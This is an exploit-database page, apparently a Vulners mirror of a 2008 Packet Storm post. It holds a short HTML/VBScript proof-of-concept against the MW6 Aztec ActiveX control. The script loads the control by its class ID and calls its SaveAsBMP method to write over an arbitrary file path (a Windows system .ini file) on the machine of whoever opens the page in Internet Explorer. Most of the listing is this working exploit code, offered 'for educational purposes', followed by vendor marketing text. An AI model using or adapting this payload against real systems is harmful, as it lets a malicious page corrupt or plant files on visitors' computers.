Lucene search
K

mw6aztec-insecure.txt

🗓️ 30 Oct 2008 00:00:00Reported by Dr.PantagonType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Aztec ActiveX ver 3.0.0.1 by MW6 Technologies, Inc., for educational purposes, contains SaveAsBMP and SaveAsWMF methods, tested on Windows XP Professional SP2 with Internet Explorer 6, exploit

Code
`<!--  
By Dr.Pantagon  
DeltaSecurityCenter  
www.DeltaSecurity.ir  
Description : Aztec ActiveX  
ver : 3.0.0.1  
CopyRight : MW6 Technologies, Inc.   
Download Link : http://www.mw6tech.com/aztec/MW6Aztec.ZIP  
  
This was written for educational purpose. Use it at your own risk.  
Author will be not responsible for any damage.  
  
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6  
  
This control contains two methods SaveAsBMP(); And SaveAsWMF();  
  
Sub SaveAsWMF (  
ByVal FileName As String   
)  
  
AND  
  
Sub SaveAsWMF (  
ByVal FileName As String   
)  
you can see this problem to all product this company  
-->  
<html>  
Test Exploit page  
<object classid='clsid:F359732D-D020-40ED-83FF-F381EFE36B54' id='target' ></object>  
<script language='vbscript'>  
  
targetFile = "C:\WINDOWS\system32\Aztec.dll"  
prototype = "Sub SaveAsBMP ( ByVal FileName As String )"  
memberName = "SaveAsBMP"  
progid = "AZTECLib.MW6Aztec"  
argCount = 1  
  
arg1="c:\windows\system_.ini"  
  
target.SaveAsBMP arg1   
'target.SaveAsWMF arg1   
  
  
</script>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation